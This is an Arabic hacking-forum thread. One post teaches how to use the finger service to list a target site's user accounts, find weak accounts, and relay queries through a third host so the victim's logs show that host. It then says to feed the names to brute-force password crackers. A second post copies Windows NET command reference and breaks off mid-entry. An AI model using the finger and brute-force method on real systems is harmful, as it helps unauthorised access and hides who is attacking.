ملاحظة ::: سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الأستمرار بأستخدام
وندوز ستكون كتابة الأوامر في موجه الدوس ثم في التلنت وستكون كتابة الأوامر نفسها الأوامر التي
تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم www" في الوندوز مراعيا اسم الموقع
مثلا يكون كتابة الأوامر في لينوكس هكذا :
[email protected]
ولكن في وندوز سيكون هكذا :
finger http://www.anyname.com/
لاحظ المسافة بين finger و www


اطبع في محث الأوامر في يونكس ( على افتراض انك تستخدم unix shell ) :

[email protected]
لاحظ ان الهدف (الموقع المرادالأستعلام عنه مثلا معرفة من هم مستخدمينه ) هنا هو http://www.foobar.com/ كمثال

فستظهرالنتائج:

Login: Name: Tty: Idle: When: Where:

root foobar sys console 17d Tue 10:13 node0ls3.foobar.com
Amos Amanda <.......> <.......> <.......>
Anderson Kenneth
Bright Adrian
Doe John
Johnson Peter <.......> <.......> <.......>
Mitnick Kevin
Munson Greg
Orwell Dennis


الآن ماذا تعني هذه النتائج؟
في العمود الأول ( login )نرى أسماء المستعملين وفي الثاني (Name) "الأسماء الحقيقية"،
التي بالطبع ليست حقيقية، لكن في معظم الوقت حقيقة.

يرينا العمود الثالث (Tty)النوع الطرفي the terminal type
والرابع (Idle) فترة التوقفthe idle time.
وبعد ذلك في العمودين الخامس والسادس
الوقت والمكان الذي استخدم فيه الحساب للأتصال بالنظام.
أحيانا توجد أعمدة بعنواوين الأيميلات وأرقام هواتف ..الخ الخاصة بمستخدمين هذا النظام

إذا كنت تريد المزيد من المعلومات عن مستخدم معيّن (Johnson Peter بيتر جونسن
على سبيل المثال) أدخل الأمر التالي:

finger [email protected]



1.4 بعض الخدع عند استخدام خدمة Finger
< =========================
===========>

أتمنّى الآن شاهدت ما الضعف الرئيسي لخدمة Finger.
Finger deamon يريك ماهي الحسابات الموجوده على النظام.
هذا يعني أنك تكسب (عن طريق قانوني ) 50 % من المجموعة السحرية وهي
كلمات السر/مجموعة أسماء المستخدمين التي ستمنحك الدخول (Access)إلى نظام.
إذا عرفت أسماء المستخدمين، ستكون الخطوة القادمة متوقفه على برنامج bruteforce أو
بمعنى آخر برامج تخمين الباسوورد worldist password cracker

هناك سكربتات خاصّة كتبت للتيلنت على سبيل المثال
اذهب لموقع http://www.thehackerschoice.com/ أو ابحث عن
VLAD's pwscan.pl

لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي (word او المفكره)
وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة
استخدم برنامج bruteforce -أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة
وتجعل البرنامج يعمل عمله-
بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات.
وخاصة حساب الإدارة (Admin) أو الجذر(root) بسبب انه عندما تعرف الباسوورد الخاص بهم
وقتها تستطيع التحكم بالموقع . وبالطبع بعض الحسابات سهلة تخمين كلمة السر .
هناك بعض الخدع لمعرفة هذا النوع من الحسابات. على سبيل المثال
إطبع الأمر:

finger [email protected]

عندما ترسل هذا الأمر الي Finger Deamon سيعطيك جميع الحسابات
التي تحتوي على كلمة "secret" أمّا في اسم المستعمل أو الإسم الحقيقي.
اذا، ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "test" أو "temp" أو "0000"
بدلا من "secret" وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات
سهل معرفة باسوورداته في أغلب الأحيان.

finger .@foobar.com

finger [email protected]

جرب هذه الأوامر وشاهد ما يحدث!
حاول التعرف على Finger Deamon، أقرأRFC وأوجد خدعك بنفسك!



1.5 الأستعلام عن طريق موقع بأستخدام Finger
< =========================
=============>

إذا أردت ان استخدم خدمة Finger (معنى Finger كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم")
والأستعلام عن موقع معين مثل هذا"www.victim.com"
وأيضا تعرف أن موقع آخر "www.host.com" يقدم خدمة Finger تعمل،
عندها يمكنني ان أقدم طلبا مثل هذااكتب في محث الأوامر مثل هذا)

[email protected]@victim.com

Host.com يستعلم (Finger) الآن victim.com ويريك النتائج.
أحدالفوائد من هذه الطريقة انك ستكون مجهول لدى victim.com
فعندما تقوم http://www.victim.com/
بطلب سجل (الدخولlog) ستشاهد http://www.host.com/ في سجلاتهم، بدلا منك .
فائدة اخرى وهي أنك يمكن ان تترك Host (موقع) يقوم ( عن طريق خدمة Finger )بالأستعلام عن حاسوبا
آخرا على نفس الشبكة ، بينما اذا طلبت انت هذا الأستعلام بأستخدام خدمة Finger من جهازك
لن تكون مسموحة لك لأنك سأكون غير موثوق به لدى المستعلم عنه
بعكس اذا كان الطلب للأستعلام باستخدام Finger عن طريق موقع .

يعني الخلاصة : ان الموقع الذي تريد الأستعلام عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس
اذا كان الأستعلام عن طريق موقع اخر يشابهه فسوف يسمح له !.


1.6الأستنتاج من هذا الدرس
<=======================>

Finger Deamon يمكن أن يكون مصدر معلومات ضخم لأي واحد يحاول
كسب الدخول( access ) إلى نظام.
Finger deamon قانونيا يزوّدك بنصف كلمات السر واسماء المستخدمين
التي تحتاجها لكسب الدخول access.
هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها
من معرفتك لهذه الحسابات تستطيع كسر الباسووردات ، بإستعمال تقنية wordlist أو bruteforce.
تذكّر فوائد "الأستعلام عن طريق موقع"أيضا بأستعمال Finger deamon.
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:11   #8
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" شرح مختصر لإدارة الشبكة بإستخدام الامرNET "

<منقول من موقع نورة>
تستخدم العديد من الخدمات أوامر شبكة الاتصال التي تبدأ بالكلمة net. تملك أوامر net هذه بعض الخصائص المشتركة:
يمكنك مشاهدة قائمة بكافة أوامر net المتوفرة بكتابة ‎net /?‎ في موجه الأوامر.
يمكنك الحصول على تعليمات بناء الجملة في سطر الأوامر لأمر net عن طريق كتابة net help command في موجه الأوامر. على سبيل المثال، للحصول على تعليمات الأمر net accounts، اكتب مايلي:
net help accounts
تقبل كافة أوامر net خيارات سطر الأوامر ‎/y‎ (نعم) و ‎/n‎ (لا). على سبيل المثال، يطالبك الأمر net stop server بتأكيد رغبتك في إيقاف كافة خدمات الملقم التابعة، بينما يتجاوز net stop server /y، عن طريق الإجابة بنعم تلقائياً، المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم.
إذا كان اسم الخدمة يحتوي على فراغات، استخدم علامات الاقتباس حول النص (أي، "Service Name"). على سبيل المثال، يشغّل الأمر التالي خدمة net logon:
net start "net logon"‎
أوامر خدمات Net
Net accounts
يحدّث قاعدة بيانات حسابات المستخدمين ويعدل كلمة المرور ومتطلبات تسجيل الدخول من أجل جميع الحسابات.
بناء الجملة
net accounts ‎[/forcelogoff:{minutes | no}]‎ ‎[/minpwlen:length]‎ ‎[/maxpwage:{days | unlimited}]‎ ‎[/minpwageays]‎ ‎[/uniquepw:number]‎ ‎[/domain]‎
المعلمات
‎/forcelogoff:{minutes | no}‎
تعين عدد الدقائق التي يجب انتظارها قبل إنهاء جلسة عمل مستخدم مع ملقم ما عندما تنتهي مدة صلاحية حساب المستخدم أو وقت تسجيل الدخول الصالح. تمنع القيمة الافتراضية، no، من فرض تسجيل الخروج على المستخدمين.
‎/minpwlen:length
تعين الحد الأدنى لعدد الأحرف من أجل كلمة مرور حساب المستخدم. يتراوح النطاق ما بين 0 و 127 حرفاً ويكون الافتراضي هو ستة أحرف.
‎/maxpwage:{days | unlimited}‎
تعين الحد الأقصى لعدد الأيام التي تكون فيها كلمة المرور الخاصة بحساب المستخدم صالحة. تعين القيمة unlimited أنه ليس هناك حد أقصى للوقت. يجب أن يكون خيار سطر أوامر ‎/maxpwage‎ أكبر من ‎/minpwage‎. ويترواح النطاق ما بين 1 و 49,710 يوماً (أي أن unlimited يكافئ 49,710 يوماً)، والقيمة الافتراضية هي 90 يوماً.
‎/minpwageays
تعين الحد الأدنى لعدد الأيام قبل أن يتمكن المستخدم من تغيير كلمة مرور جديدة. القيمة الافتراضية هي 0 يوماً، والتي تعين أنه ليس هناك حد أدنى للوقت. ويتراوح النطاق ما بين 0 و 49,710 يوماً.
‎/uniquepw:number‎
تتطلب أن لا يكرر المستخدم كلمة المرور نفسها بعدد المرات number المعين لعمليات تغيير كلمة المرور. يتراوح النطاق ما بين 0 و 24 من عمليات تغيير كلمة المرور، والافتراضي هو أن تكون عمليات التغيير بمقدار خمس كلمات مرور .
‎/domain
تنجز العملية على وحدة تحكم المجال الأساسية للمجال الحالي. وإلا, يتم تنفيذ العملية على الكمبيوتر المحلي.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
• يجب أن تكون خدمة Net Logon قيد التشغيل على الكمبيوتر حيث ترغب بتغيير معلمات الحساب. عند الاستخدام دون معلمات، يعرض net accounts الإعدادات الحالية لكلمة المرور، وتحديدات تسجيل الدخول، ومعلومات المجال.
• يجب تنفيذ مايلي قبل أن تتمكن من استخدام net accounts:
o إنشاء حسابات المستخدمين. استخدم إدارة المستخدمين أو net user لإعداد حسابات المستخدمين.
o تشغيل خدمة Net Logon على كافة الملقمات التي تتحقق من تسجيل الدخول في المجال. يتم تشغيل Net Logon تلقائياً عند بدء التشغيل.
• عند استخدام ‎/forcelogoff:‎minutes، يتم إرسال تحذير قبل دقائق من فرض تسجيل الخروج من شبكة الاتصال على المستخدمين. يتم أيضاً إعلام المستخدمين فيما إذا كانت هناك أية ملفات مفتوحة. إذا كانت minutes أقل من اثنين، يتم تحذير المستخدمين بتسجيل الخروج من شبكة الاتصال فوراً.
أمثلة
لعرض الإعدادات الحالية، ومتطلبات كلمة المرور، ودور ملقم ما، اكتب:
net accounts
لتعيين الحد الأدنى بسبعة أحرف لكلمات مرور حسابات المستخدمين، اكتب:
net accounts /minpwlen:7
لتعيين إمكانية إعادة استخدام كلمة مرور من قبل المستخدمين فقط بعد المرة الخامسة التي يغيرون فيها كلمات المرور، اكتب:
net accounts /uniquepw:5
لمنع المستخدمين من تغيير كلمات المرور أكثر من كل سبعة أيام، وفرض تغيير كلمات المرور عليهم كل 30 يوماً، وفرض تسجيل الخروج عليهم بعد انتهاء مدة صلاحية وقت تسجيل الدخول مع تحذير مدته خمس دقائق، اكتب:
net accounts /minpwage:7 /maxpwage:30 /forcelogoff:5
لضمان أن تكون الإعدادات السابقة سارية المفعول من أجل المجال الذي تم تسجيل دخول الكمبيوتر إليه، اكتب:
net accounts /minpwage:7 /maxpwage:30 /domain

Net computer
يضيف أو يحذف أجهزة كمبيوتر من قاعدة بيانات مجال.
بناء الجملة
‎net computer \\ComputerName {/add | /del}‎
المعلمات
‎\\ComputerName
تعين الكمبيوتر لتتم إضافته أو حذفه من المجال.
‎{/add | /del}‎
تضيف أو تزيل الكمبيوتر المعين من المجال.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
• Net computer يعيد توجيه كافة عمليات إضافة وحذف أجهزة الكمبيوتر إلى وحدة تحكم المجال.
أمثلة
لإضافة الكمبيوتر Grizzlybear إلى مجال، اكتب:
net computer ‎\\grizzlybear‎ /‎add

Net config
يعرض الخدمات قيد التشغيل والقابلة للتكوين، أو يعرض ويغير إعدادات خدمة الملقم أو خدمة محطة العمل. عند الاستخدام دون معلمات، يعرض net config قائمة بالخدمات القابلة للتكوين.
بناء الجملة
‎net config [{server|workstation}]‎
المعلمات
server
تعرض إعدادات خدمة الملقم وتسمح لك بإجراء تغييرات عليها بينما تكون الخدمة قيد التشغيل.
workstation
تعرض إعدادات خدمة محطة العمل وتسمح لك بإجراء تغييرات عليها بينما تكون الخدمة قيد التشغيل.
‎/?‎
تعرض التعليمات في موجه الأوامر.
ملاحظات
استخدم net config server لتغيير إعدادات خدمة الملقم القابلة للتكوين. تكون التغييرات نافذة المفعول في الحال ودائمة.
لا يمكنك تغيير كافة إعدادات خدمة الملقم باستخدام net config server. يعرض Net config server المعلومات التالية التي لا يمكنك تكوينها:
Server computer name
Server comment
Server version (أي، رقم إصدار البرنامج)
Server is active on (أي، وصف لشبكة الاتصال)
Server hidden (أي، الإعداد ‎/hidden‎)
Maximum logged on users (أي، الحد الأقصى لعدد المستخدمين الذين يمكنهم استخدام موارد الملقم المشتركة)
Maximum open files per session (أي، الحد الأقصى لعدد ملفات الملقم التي يمكن أن يفتحها المستخدمون أثناء جلسة العمل)
Idle session time (بالدقائق)
استخدم net config workstation لتغيير إعدادات خدمة محطة العمل القابلة للتكوين.
يعرض Net config workstation المعلومات التالية:
Computer name
Full computer name
User name
Workstation active on (أي، وصف لشبكة الاتصال)
Software version (أي، رقم إصدار البرنامج)
Workstation domain
Workstation domain DNS name
Logon domain
COM open timeout (بالثواني)
COM send count (بالبت)
COM send timeout (بالميللي ثانية)

Net continue
يتابع خدمة تم إيقافها بشكل مؤقت بواسطة net pause.
بناء الجملة
net continue service
المعلمات
service
مطلوبة. تعين الخدمة التي تريد متابعتها. يسرد الجدول التالي بعض قيم service.
القيمة الوصف
netlogon تتابع خدمة Net Logon.
"nt lm security support provider" تتابع خدمة NT LM Security Support Provider.
schedule تتابع خدمة جدولة المهام.
server تتابع خدمة الملقم.
workstation تتابع خدمة محطة العمل.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
• لإجراء تصحيح صغير على مورد ما، قم بإيقاف الخدمة مؤقتاً. استخدم الأمر net continue لإعادة تنشيط الخدمة أو الطابعة، دون إلغاء اتصالات المستخدم.
• يمكن أن يختلف تأثير إيقاف الخدمة مؤقتاً ومتابعتها بحسب كل خدمة.
• إذا كان اسم الخدمة يحتوي على فراغات، استخدم علامات الاقتباس حول النص (على سبيل المثال، "Service Name").
أمثلة
يتابع الأمر التالي خدمة محطة العمل:
net continue workstation
إذا كان اسم الخدمة يتألف من كلمتين أو أكثر، عليك تضمين اسم الخدمة ضمن علامات اقتباس. على سبيل المثال، لمتابعة خدمة NT LM Security Support Provider Service، اكتب:
‎net continue "nt lm security support provider"‎

Net file
يعرض أسماء كافة الملفات المشتركة المفتوحة على ملقم ما وعدد عمليات تأمين الملفات، في حال وجودها، على كل ملف. يغلق هذا الأمر أيضاً الملفات المشتركة الفردية ويزيل عمليات تأمين الملفات. عند الاستخدام دون معلمات، يعرض net file قائمة بالملفات المفتوحة على الملقم.
بناء الجملة
‎net file [ID [/close]]‎
المعلمات
ID
تعين رقم تعريف الملف.
‎/close‎
تغلق ملفاً مفتوحاً وتحرر السجلات التي تم تأمينها. اكتب هذا الأمر من موجه الأوامر على الملقم حيث تتم مشاركة الملف.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
يمكنك أيضاً كتابة net files لتشغيل هذا الأمر.
استخدم net file لعرض الملفات المشتركة على شبكة الاتصال والتحكم بها. في بعض الأحيان، يترك المستخدم ملفاً مشتركاً مفتوحاً ومؤمناً بطريق الخطأ. عند حدوث هذا، لا يمكن لأجهزة الكمبيوتر الأخرى على شبكة الاتصال الوصول إلى الأجزاء المؤمنة من الملف. استخدم net file /close لإزالة التأمين وإغلاق الملف. إن إخراج net file مشابه لمايلي:
File Path Username #locks
-------------------------------------------
‎0 C:\A_FILE.TXT MARYSL 0
‎1 C:\DATABASE DEBBIET 2
أمثلة
لعرض معلومات حول الملفات المشتركة، اكتب:
net file
لإغلاق ملف لديه رقم التعريف 1، اكتب:
net file 1 /close

Net group
يضيف، أو يعرض، أو يعدل المجموعات العمومية في المجالات.
بناء الجملة
‎net group [groupname [/comment:"text"]]‎ ‎[/domain]‎
net group [groupname ‎{/add [/comment:"text"] | /delete} [/domain]]‎
‎net group [groupname username[ ...] {/add | /delete} [/domain]]‎
المعلمات
groupname
تعين اسم المجموعة لتتم إضافتها، أو توسيعها، أو حذفها. عيّن اسم مجموعة لعرض قائمة المستخدمين في المجموعة فقط.
‎/comment:"text"‎
تضيف تعليقاً لمجموعة جديدة أو موجودة. يمكن أن يحتوي التعليق على 48 حرفاً كحد أقصى. قم بتضمين النص ضمن علامات اقتباس.
‎/domain
تنفذ العملية على وحدة تحكم المجال في المجال الحالي. وإلا, يتم تنفيذ العملية على الكمبيوتر المحلي.
‎/add
تضيف مجموعة، أو تضيف اسم مستخدم إلى مجموعة. يجب تأسيس حساب للمستخدمين الذين تضيفهم إلى المجموعة باستخدام هذا الأمر.
‎/delete‎
تزيل مجموعة، أو تزيل اسم مستخدم من مجموعة.
‎UserName[ ...]‎
تسرد اسم واحد أو أكثر من أسماء المستخدمين لتتم إضافته إلى مجموعة أو لتتم إزالته منها. افصل إدخالات أسماء المستخدمين المتعددة بفراغات.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
عند الاستخدام دون معلمات، يعرض net group اسم الملقم وأسماء المجموعات الموجودة عليه.
يمكنك أيضاً كتابة net groups.
استخدم net group لتجميع المستخدمين الذين يستخدمون شبكة الاتصال بطرق متشابهة أو بنفس الطرق. عندما تعين حقوق لمجموعة ما، فإن كل عضو في المجموعة يملك هذه الحقوق تلقائياً. في الإخراج، يسبق net group المجموعات التي تتضمن مستخدمين ومجموعات بآن واحد بالعلامة النجمية (*).
إخراج net group للمجموعات على الملقم مشابه لمايلي:
Group Accounts for \\PRODUCTION
----------------------------------------------
‎*‎Domain Admins ‎*‎Domain Users
أمثلة
لعرض قائمة بكافة المجموعات الموجودة على الملقم المحلي، اكتب:
net group
لإضافة مجموعة تدعى nor إلى قاعدة بيانات حسابات المستخدمين المحلية، اكتب:
net group NOR /add
لإضافة مجموعة تدعى nor إلى قاعدة بيانات المجال، اكتب:
net group NOR /add /domain
لإضافة حسابات المستخدمين الموجودة stevev، و ralphr، و jennyt إلى المجموعة nor على الكمبيوتر المحلي، اكتب:
net group NOR stevev ralphr jennyt /add
لإضافة حسابات المستخدمين الموجودة stevev، و ralphr، و jennyt إلى المجموعة nor في قاعدة بيانات المجال، اكتب:
net group NOR stevev ralphr jennyt /add /domain
لعرض المستخدمين في المجموعة nor، اكتب:
net group NOR

Net help
يوفر قائمة بأوامر ومواضيع شبكة الاتصال التي يمكنك الحصول على التعليمات الخاصة بها، أو يوفر معلومات حول أمر معين. عند الاستخدام دون معلمات، يعرض net help قائمة بالأوامر والمواضيع التي يمكنك الحصول على التعليمات الخاصة بها.
بناء الجملة
net help [command]‎
المعلمات
command
‎/help‎
تعرض بناء الجملة الصحيح وتعليمات الأمر.
تعين الأمر الذي تريد التعليمات الخاصة به.
أمثلة
لعرض التعليمات الخاصة بالأمر net use، اكتب:
net help use
أو اكتب:
net use /help
لعرض بناء الجملة للأمر net help فقط، اكتب:
‎net help /?‎

Net helpmsg
يفسر سبب حدوث خطأ ويوفر معلومات لحل المشكلة.
بناء الجملة
net helpmsg message#‎
المعلمات
message#‎
مطلوبة. تعين الرقم ذو الخانات الأربعة للرسالة التي تريد الحصول على المزيد من المعلومات حولها.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
عند فشل عمل شبكة الاتصال، تظهر رسالة مشابهة لمايلي:
‎2182: The requested service has already been started.‎
أمثلة
للحصول على المزيد من المعلومات حول رسالة الإعلام بالخطأ NET 2182، اكتب:
net helpmsg 2182

Net localgroup
يضيف المجموعات الحلية، أو يعرضها، أو يعدلها. عند الاستخدام دون معلمات، يعرض net localgroup اسم الملقم وأسماء المجموعات المحلية على الكمبيوتر.
بناء الجملة
‎net localgroup [GroupName [/comment:"text"]]‎ ‎[/domain]‎
net localgroup [GroupName ‎{/add [/comment:"text"] | /delete}‎ ‎[/domain]]‎
net localgroup [GroupName name [ ...] ‎{/add | /delete} [/domain]]‎
المعلمات
GroupName
تعين اسم المجموعة المحلية لتتم إضافتها، أو توسيعها، أو حذفها. عند الاستخدام دون معلمات إضافية، يعرض net localgroup GroupName قائمة بالمستخدمين أو المجموعات العمومية في المجموعة المحلية.
‎/comment:"text"‎
تضيف تعليقاً لمجموعة جديدة أو موجودة. يمكن أن يحتوي التعليق حتى 48 حرفاً. قم بتضمين النص ضمن علامات اقتباس.
‎/domain
تنفذ العملية على وحدة تحكم المجال الأساسية للمجال الحالي. وإلا, يتم تنفيذ العملية على الكمبيوتر المحلي.
‎name [ ...]‎
تسرد اسماً واحداً او أكثر من أسماء المستخدمين أو المجموعات لتتم إضافتها أو إزالتها من مجموعة محلية.
‎/add
تضيف اسم مجموعة عمومية أو اسم مستخدم إلى مجموعة محلية. عليك أولاً تأسيس حساب للمستخدمين أو المجموعات العمومية قبل أن تتمكن من إضافتها إلى مجموعة محلية بواسطة هذا الأمر.
‎/delete‎
تزيل اسم مجموعة أو اسم مستخدم من مجموعة محلية.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
استخدام ‎/domain‎
تطبق ‎/domain‎ فقط على أجهزة كمبيوتر Windows XP Professional الأعضاء في مجال ما. افتراضياً، تنفذ أجهزة كمبيوتر الملقم العمليات على وحدة تحكم المجال الأساسية.
استخدام name
افصل الإدخالات المتعددة باستخدام فراغات. يمكن أن تكون الأسماء عبارة عن مستخدمين محليين، أو مستخدمين على المجالات الأخرى، أو مجموعات عمومية، لكن لا يمكن أن تكون من المجموعات المحلية الأخرى. إذا كان المستخدم من مجال آخر، استهل اسم المستخدم باسم المجال (على سبيل المثال، Sales\Ralphr).
تجميع المستخدمين
استخدم net localgroup لتجميع المستخدمين الذين يستخدمون الكمبيوتر أو شبكة الاتصال بطرق متشابهة أو بنفس الطرق. عند تعيين الحقوق لمجموعة محلية، فإن كل عضو في المجموعة المحلية يملك تلقائياً الحقوق نفسها.
أمثلة
لعرض قائمة بكافة المجموعات المحلية على الملقم المحلي، اكتب:
net localgroup
لإضافة مجموعة محلية تدعى Exec إلى قاعدة بيانات حسابات المستخدمين المحلية، اكتب:
net localgroup exec /add
لإضافة مجموعة محلية تدعى Exec إلى قاعدة بيانات حسابات مستخدمي المجال، اكتب:
net localgroup exec /add /domain
لإضافة حسابات المستخدمين الموجودة stevev، و ralphr (من المجال Sales)، و jennyt إلى المجموعة المحلية Exec على الكمبيوتر المحلي، اكتب:
net localgroup exec stevev sales\ralphr jennyt /add
لإضافة حسابات المستخدمين الموجودة stevev، و ralphr، و jennyt إلى المجموعة Exec لمجال، اكتب:
net localgroup exec stevev ralphr jennyt /add /domain
لعرض المستخدمين في المجموعة المحلية Exec اكتب:
net localgroup exec
لإضافة تعليق إلى سجل المجموعة المحلية Exec، اكتب:
net localgroup exec /comment:"The executive staff."

Net pause
يسبب التوقف المؤقت للخدمات قيد التشغيل حالياً.
بناء الجملة
net pause service
المعلمات
service
مطلوبة. تعين الخدمة التي تريد إيقافها مؤقتاً. يسرد الجدول التالي بعض قيم service.
القيمة الوصف
netlogon تؤدي إلى إيقاف الخدمة Net Logon مؤقتاً.
‎"nt lm security support provider"‎ تؤدي إلى إيقاف الخدمة NT LM Security Support Provider مؤقتاً.
schedule تؤدي إلى إيقاف خدمة جدولة المهام مؤقتاً.
server تؤدي إلى إيقاف خدمة الملقم مؤقتاً.
workstation تؤدي إلى إيقاف خدمة محطة العمل مؤقتاً.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
على ملقم ما، استخدم net pause قبل إيقاف الخدمة للسماح للمستخدمين بإتمام المهام أو قطع الاتصال بالموارد. إن التوقف المؤقت للخدمة يضعها في حالة حجز، لكنه لا يزيل البرنامج من الذاكرة. يمكن للمستخدمين الذين لديهم اتصال مسبق بالمورد إنهاء المهام الخاصة بهم، ولكن يتم منع الاتصالات الجديدة بالمورد.
إذا كنت تخطط لإيقاف خدمة تؤثر على الموارد المشتركة، قم أولاً بإيقافها مؤقتاً. استخدم net send لبث رسالة تفيد بأنك ستعمل على إيقاف الخدمة. بعد تزويد الأشخاص بالوقت الكافي للانتهاء من استخدام المورد، استخدم net stop لإيقاف الخدمة.
لإعادة تنشيط خدمة تم إيقافها مؤقتاً، استخدم net continue.
لا يمكنك إيقاف كافة الخدمات مؤقتاً. يؤثر التوقف المؤقت على الخدمات بالأشكال التالية:
إن الإيقاف المؤقت لخدمة Net Logon يمنع الكمبيوتر من معالجة طلبات تسجيل الدخول. إذا كان للمجال ملقمات تسجيل دخول أخرى، يمكن أن يستمر تسجيل دخول المستخدمين إلى شبكة الاتصال.
إن الإيقاف المؤقت لخدمة الملقم يمنع المستخدمين من إجراء اتصالات جديدة بالموارد المشتركة للملقم. في حال عدم وجود ملقمات تسجيل دخول أخرى على شبكة الاتصال، فإن ذلك يمنع المستخدمين من تسجيل الدخول إلى شبكة الاتصال. لا تتأثر الاتصالات الموجودة. يمكن للمسؤولين إجراء اتصالات مع الملقم حتى إذا تم إيقافه بشكل مؤقت.
إن الإيقاف المؤقت لخدمة محطة العمل يحفظ اسم المستخدم، وكلمة المرور، والاتصالات معرّفة، ولكنه يوجه الطلبات من أجل أجهزة الطباعة إلى الطابعات المتصلة بالكمبيوتر بدلاً من الطابعات المتصلة بالشبكة.
إذا كان اسم الخدمة يحتوي على فراغات، استخدم علامات الاقتباس حول النص (على سبيل المثال، "Service Name").
أمثلة
لإيقاف خدمة الملقم بشكل مؤقت، اكتب:
net pause server
إذا كان اسم الخدمة يتألف من كلمتين أو أكثر، عليك تضمين اسم الخدمة ضمن علامات اقتباس. على سبيل المثال، لإيقاف الخدمة "NT LM Security Support Provider" مؤقتاً، اكتب:
‎net pause "nt lm security support provider"

Net print
يعرض معلومات حول قائمة انتظار طباعة معينة، أو يعرض معلومات حول كافة قوائم انتظار الطباعة التي تتم استضافتها من قبل ملقم طباعة معين، أو يعرض معلومات حول مهمة طباعة معينة، أو يتحكم بها. عند الاستخدام دون معلمات، يعرض net print تعليمات سطر الأوامر للأمر net print.
لعرض معلومات حول قائمة انتظار طباعة معينة أو حول كافة قوائم انتظار الطباعة التي تتم استضافتها من قبل ملقم طباعة معين
بناء الجملة
‎net print \\ComputerName[\QueueName]‎
المعلمات
‎\\ComputerName
مطلوبة. تعين، حسب الاسم، الكمبيوتر الذي يستضيف قائمة انتظار الطباعة التي ترغب بعرض المعلومات المتعلقة بها.
‎\QueueName‎
تعين، حسب الاسم، قائمة انتظار الطباعة التي ترغب بعرض المعلومات الخاصة بها. في حال تعيين كمبيوتر وعدم تعيين قائمة انتظار، يتم عرض المعلومات المتعلقة بكافة قوائم انتظار الطباعة على الكمبيوتر المعين.
net help net print
تعرض التعليمات الخاصة بالأمر net print.
ملاحظات
يعرض Net print عدة أنواع من المعلومات المتعلقة بقوائم انتظار الطباعة. المثال التالي هو مثال عن تقرير يتعلق بكافة قوائم انتظار الطباعة على الملقم المسمى NOR2000:
قوائم انتظار الطابعة عند \\NOR2000
Name Job # Size Status

---------------------------------------------------------

LASER Queue 1 jobs ‎*Queue Active*‎

USER1 84 0 Spooling
أمثلة
لسرد محتويات قائمة انتظار الطباعة Dotmatrix على الكمبيوتر ‎\\NOR2000‎، اكتب:
net print \\NOR2000\dotmatrix
لعرض معلومات حول مهمة طباعة معينة أو التحكم بها
بناء الجملة
‎net print [\\ComputerName]‎ ‎JobNumber [{/hold | /release | /delete}]‎
المعلمات
‎\\ComputerName
تعين، حسب الاسم، الكمبيوتر الذي يستضيف مهمة الطباعة التي تريد التحكم بها. إذا لم تعين كمبيوتر، يتم افتراض الكمبيوتر المحلي.
JobNumber
مطلوبة. تعين رقم مهمة الطباعة التي تريد التحكم بها. يتم تعيين هذا الرقم من قبل الكمبيوتر الذي يستضيف قائمة انتظار الطباعة التي تم إرسال مهمة الطباعة إليها. بعد أن يعين الكمبيوتر رقماً لمهمة الطباعة، لا يتم تعيين هذا الرقم لأي مهمة طباعة أخرى في أي قائمة انتظار تتم استضافتها من قبل ذلك الكمبيوتر.
‎{/hold | /release | /delete}‎
تعين الإجراء الذي يجب اتخاذه مع مهمة الطباعة. تؤخر المعلمة ‎/hold‎ المهمة، مما يسمح لمهام الطباعة الأخرى بتجاوزها إلى أن يتم تحريرها. تحرر المعلمة ‎/release‎ مهمة الطباعة التي تم تأخيرها. تزيل المعلمة ‎/delete‎ مهمة الطباعة من قائمة انتظار الطباعة. في حال تعيين رقم للمهمة وعدم تعيين أي إجراء، يتم عرض المعلومات المتعلقة بمهمة الطباعة.
net help net print
تعرض التعليمات الخاصة بالأمر net print.
ملاحظات
المثال التالي هو مثال عن تقرير يتعلق بمهمة طباعة:
Job # 20

Status Waiting

Size 309

Remark

Submitting user HISHEM

Notify HISHEM

Job data type

Job parameters

Additional info

أمثلة
لعرض معلومات حول المهمة ذات الرقم 20 على الكمبيوتر ‎\\NOR2000‎، اكتب:
net print \\NOR2000 20
لتأخير المهمة ذات الرقم 20 على الكمبيوتر ‎\\NOR2000‎، اكتب:
net print \\NOR2000 20 /hold
لتحرير المهمة ذات الرقم 20 على الكمبيوتر ‎\\NOR2000‎، اكتب:
net print \\NOR2000 20 /release

Net send
يرسل الرسائل إلى مستخدمين، أو أجهزة كمبيوتر، أو أسماء مراسلات أخرى على شبكة الاتصال.
بناء الجملة
net send ‎{name | * | /domain[:name] | /users} message‎
المعلمات
name
